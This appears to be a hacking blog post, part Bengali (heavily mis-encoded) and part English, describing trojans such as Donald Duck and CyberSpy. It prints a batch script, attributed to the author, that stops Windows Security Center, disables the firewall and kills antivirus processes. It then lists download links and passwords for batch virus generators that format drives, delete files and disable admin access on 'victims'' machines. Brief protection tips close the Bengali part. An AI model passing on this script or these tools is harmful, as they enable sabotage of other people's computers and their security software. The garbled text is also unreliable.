āĻāχ āϟ্āϰোāϜাāύ āϟি āϝে āĻ•োāύ āύোāϟāĻĒ্āϝাāĻĄ āĻĢাāχāϞ āĻ•ে āϟাāϰāĻ—েāϟ āĻ•āϰে । āĻāϰāĻĒāϰ āϏেāϟিāĻ•ে word āĻĢāϰāĻŽেāϟ āĻĒāϰিāĻŦāϰ্āϤāύ āĻ•āϰে note.com āĻ āύি⧟ে āϝা⧟ । āĻāϰāĻĒāϰ āϏেāϟি windows āĻāϰ āύোāϟāĻĒ্āϝাāĻĄ āĻĢোāϞ্āĻĄাāϰ āĻ āĻ•āĻĒি āĻšā§Ÿ । āĻāϰāĻĒāϰ āφāĻĒāύি āϝāϤāĻŦাāϰ āύোāϟāĻĒ্āϝাāĻĄ āĻ–ুāϞāĻŦেāύ āϤāϤāĻŦাāϰ āĻāχ āĻ­াāχāϰাāϏ āϟি āφāĻ•্āϟিāĻ­ āĻšāĻŦে ।
Donald Duck
āĻāϟি āĻāĻ•āϟি āĻŦ্āϝাāĻ• āĻĄোāϰ āϟ্āϰোāϜাāύ । āĻāϟি āĻš্āϝাāĻ•াāϰ āĻ•ে āϝেāĻ•োāύো āϏিāϏ্āϟেāĻŽ āĻ āĻĒুāϰāĻĒāϰি āύি⧟āύ্āϤ্āϰāύ āĻāύে āĻĻে⧟ । āĻāϟাāϰ āϏাāĻĨে āĻāĻ•āϟি āĻ•ি āϞāĻ—াāϰ āĻāĻŦং āϰেāϜিāϏ্āϟ্āϰি āĻāĻĄিāϟ āĻ•āϰাāϰ āĻĒ্āϰāĻ—্āϰাāĻŽ āĻĨাāĻ•ে ।āĻāϰ āϏাāĻšাāϝ্āϝে āϏিāĻĄি āĻŦা āĻĄিāĻ­িāĻĄি āϰāĻŽ āĻ–োāϞা āĻŦা āĻŦāύ্āϧ āĻ•āϰাāĻ“ āϏāĻŽ্āĻ­āĻŦ āĻšā§Ÿ । āĻāϟি āχāĻž্āϜেāĻ•্āϟ āĻ•āϰāϤে āĻš্āϝাāĻ•াāϰ23476 āĻ“ ā§¨ā§Šā§Ēā§­ā§­ āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে āĻĨাāĻ•েāύ
CyberSpy

āĻāϟি āĻŽূāϞāϤ āĻāĻ•āϟি āϏ্āĻĒাāχ āĻĒ্āϰোāĻ—্āϰাāĻŽ । āĻāϟি āϰেāϜিāϏ্āϟ্āϰি āϤে āύিāϜেāĻ•ে āĻāύ্āϟ্āϰি āĻ•āϰে āύে⧟। āϝাāϰ āĻĢāϞে āφāύ্āϟিāĻ­াāχāϰাāϏ āĻĻি⧟ে āĻĄিāϞিāϟ āĻ•āϰে āĻĻিāϞেāĻ“ āĻ•āĻŽ্āĻĒিāωāϟাāϰ āϰিāĻŦুāϟ āĻ•āϰāϞে āφāĻŦাāϰ āĻāϟি āφāĻ•্āϟিāĻ­ āĻšā§Ÿে āϝা⧟ ।
Firekill 2000
āĻāχ āϟ্āϰোāϜাāύ āϟি āĻŽাāϰাāϤ্āϤāĻ• । āĻāϟি āϏāĻŦ āϧāϰāύেāϰ āĻĢা⧟াāϰāĻ“ā§ŸাāϞ , āĻāύ্āϟিāĻ­াāχāϰাāϏ āĻ•ে disable āĻ•āϰে āĻĻিāϤে āϏāĻ•্āώāĻŽ । āĻāĻŽāύāĻ•ি āĻāϟি āϏিāĻ•িāωāϰিāϟি āϏāĻĢāϟāĻ“ā§Ÿ্āϝাāϰ āĻāϰ āύিāϰাāĻĒāϤ্āϤা  āĻ•ে āϧ্āĻŦংāϏ āĻ•āϰāϤে .dll āĻĢাāχāϞ āĻ•ে āĻĄিāϞিāϟ āĻ•āϰে āĻĻে⧟ । āϤāĻ–āύ āϏিāϏ্āϟেāĻŽ āφāĻŦাāϰ āϏেāϟāφāĻĒ āĻĻিāϤে āĻšā§Ÿ ।
āĻāĻ›া⧜া āφāϰ āĻ…āύেāĻ• āϟ্āϰোāϜাāύ āĻĒ্āϰোāĻ—্āϰাāĻŽ āφāĻ›ে । āĻ…āύেāĻ• āϟ্āϰোāϜাāύ Netcat āĻāϰ āϏাāĻšাāϝ্āϝে launch āĻ•āϰা āĻšā§Ÿ । āφāĻŦাāϰ āĻ…āύেāĻ• āϟ্āϰোāϜাāύ āϏাāϰ্āĻ­াāϰ āϰুāϟিং āĻ•āϰে āχāĻž্āϜেāĻ•্āϟ āĻ•āϰা āĻšā§Ÿ ।

āĻāĻ•āϟি āϟ্āϰোāϜাāύ āĻ­াāχāϰাāϏ
āĻāϟি āφāĻŽাāϰ āύিāϜেāϰ āĻ•োāĻĄ āĻ•āϰা āĻāĻ•āϟি āĻ›োāϟ āϟ্āϰোāϜাāύ । āĻāϟি āĻāύ্āϟিāĻ­াāχāϰাāϏ āĻāϰ āϏিāĻ•িāωāϰিāϟি āĻ•ে āϰুāĻ–ে āĻĻিāϤে āĻĒাāϰāĻŦে ।  āĻāϟি āĻŽূāϞāϤ āφāĻĒāύাāϰ āĻ“ā§Ÿিāύ্āĻĻāĻāϏ āĻāϰ āĻĢা⧟াāϰ āĻ“ā§ŸাāϞ āĻ“ āĻāύ্āϟিāĻ­াāχāϰাāϏ āĻāϰ safe guard āĻ•ে āϰুāĻ–ে āĻĻেāĻŦে । āĻāϟিāϰ āχāύ্āϟাāϰāĻĢেāϏ āϏāĻŦুāϜ āϰāĻ™েāϰ।  
@ echo off
_Rashed Hasan_

∙ rem –
  colour Db 03
∙ rem Permanently Kill Anti-Virus
∙ net stop “Security Center”
netsh firewall set opmode mode=disable ∙ tskill /A av* ∙
tskill /A fire*
tskill /A [...].
_BCA_
āφāĻĒāύাāĻĻেāϰāĻ•ে āφāϰ āĻ“ āĻāĻ•āϟি āĻŦিāϧ্āĻŦংāϏী āϟ্āϰোāϜাāύ āĻāϰ āϞিāĻ™্āĻ• āĻĻিāϤে āĻĒাāϰি । āĻ•িāύ্āϤু āϏেāϟি āĻ•āĻŽ্āĻĒিāωāϟাāϰ āĻ āϰাāύ āĻ•āϰāĻŦেāύ āύা । āĻāĻ•āϟি āϏāĻšāϜ āϟ্āϰিāĻ• āĻšāϚ্āĻ›ে āĻ•āĻĒি āĻĒেāϏ্āϟিং āϏাāχāϟ āϝেāĻŽāύ http://www.pastebin.com āĻ āϝে⧟ে āĻĒেāϏ্āϟ āĻ•āϰে āϏেāĻ­ āĻ•āϰāĻŦেāύ। āϏেāϟি āϝāĻĻি āĻ•োāύ āĻ­াāχāϰাāϏ āĻšā§Ÿ āϤāĻŦে āĻĻেāĻ–āϤে āĻĒাāĻŦেāύ āφāĻĒāύাāϰ āĻāύ্āϟিāĻ­াāχāϰাāϏ āϏিāĻ•িāωāϰিāϟি warning āĻĻেāĻŦে। āφāϰ āϏেāχ āϞিāĻ™্āĻ• āĻ āĻĒ্āϰāĻŦেāĻļ āĻ•āϰāϤে  āĻ—েāϞে āφāĻĒāύাāϰ āĻŦ্āϰাāωāϝাāϰ āĻĨেāĻŽে āϝাāĻŦে ।
āĻāχ āĻ­াāχāϰাāϏ āϟি āĻ•োāύ āĻ…āĻŦāϏ্āĻĨাāϤেāχ āϰাāύ āĻ•āϰāĻŦেāύ āύা । āĻāϟি āĻ­াāϰāϤেāϰ āĻāĻ•āϜāύ āϏিāĻ•িāωāϰিāϟি āĻāĻ•্āϏāĻĒাāϰ্āϟ āĻāϰ āĻ•োāĻĄ āĻ•āϰা
http://www.breakthesecurity.com/2010/12/how-to-disabledelete-your-victims.html

āĻŦাঁāϚাāϰ āĻ•িāĻ›ু āωāĻĒা⧟
> āφāĻĒāύি āϝে āĻāύ্āϟিāĻ­াāχāϰাāϏ āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে āĻĨাāĻ•ুāύ āύা āĻ•েāύ āϏেāϟি āφāĻĒ āϟু āĻĄেāϟ āĻĨাāĻ•āϤে āĻšāĻŦে ।
> āϏāύ্āĻĻেāĻš āϜāύāĻ• āĻ•োāύ āϟুāϞ āĻŦা āϞিāĻ™্āĻ• āĻ āĻ•্āϞিāĻ• āĻ•āϰāĻŦেāύ āύা ।
> āφāĻĒāύাāϰ antivirus āĻāϰ āĻĒাāĻļাāĻĒাāĻļি  anti spam āĻ“ anti rootkit āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāĻŦেāύ । āφāĻŽি āĻŦāϞāĻŦ āĻ…্āϝাāύ্āϟিāĻ­াāχāϰাāϏ āĻāϰ āϏাāĻĨে āφāĻĒāύি kaspersky āĻāϰ TDS killer āϟুāϞ āϟী āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāϤে āĻĒাāϰেāύ । āĻāϟি āĻĒুāϰো āĻĒুāϰি āĻĒোāϰ্āϟেāĻŦāϞ āĻāĻ•āϟি āϟুāϞ ।

āϤাāĻšāϞে āφāϜ āĻāχ āĻĒāϰ্āϝāύ্āϤāχ āĻ›িāϞ ।

VIRUS CREATOR SOFTWARE


SONIC BAT - THE BATCH FILE VIRUS CREATOR 


This program creates batch (.bat) viruses and has
 varied options to ruin the victim computer in 
different ways. We can flood the storage space 
 on victims' computer by making large number 
of files in different folders by using its "folder 
flood" feature. It also includes bat to exe 
converter to convert your batch virus files i
nto exe virus programs and an icon changer.

Download here:

http://www.mediafire.com/download.php?ijzjmx3kd3t

DELmE's BATCH VIRUS GENERATOR 



DELmE's Batch Virus Generator is an amazing virus creation 
program with lots of options to infect the victim PC such as format
 C: drive, delete all files, disable admin, clean registry, change home 
page, kill tasks, antivirus and firewall and lots more. 

Download here:  

http://www.ziddu.com/download/7051522/DELmE_sBatchVirusGeneratorv2.0.rar.html 

Password: hackingguide

BATCH TO EXE CONVERTER



Batch to exe converter is a program to convert batch (.bat) 
files to executable (.exe) files. It includes several options such 
as including any other file, adding an icon to the file before compilation. 

Download here:  

http://www.ziddu.com/download/6961652/Batch_to_Exe_converter.rar.html 

Password: hackingguide

VIRUS CREATOR


This Virus Creator is a simple one as it gives few options
 to infect victim's computer like format system drive, 
corrupt system files etc. 

Download here:  

http://www.ziddu.com/download/6953378/VirusCreatorV.65.rar.html 


Password: hackingguide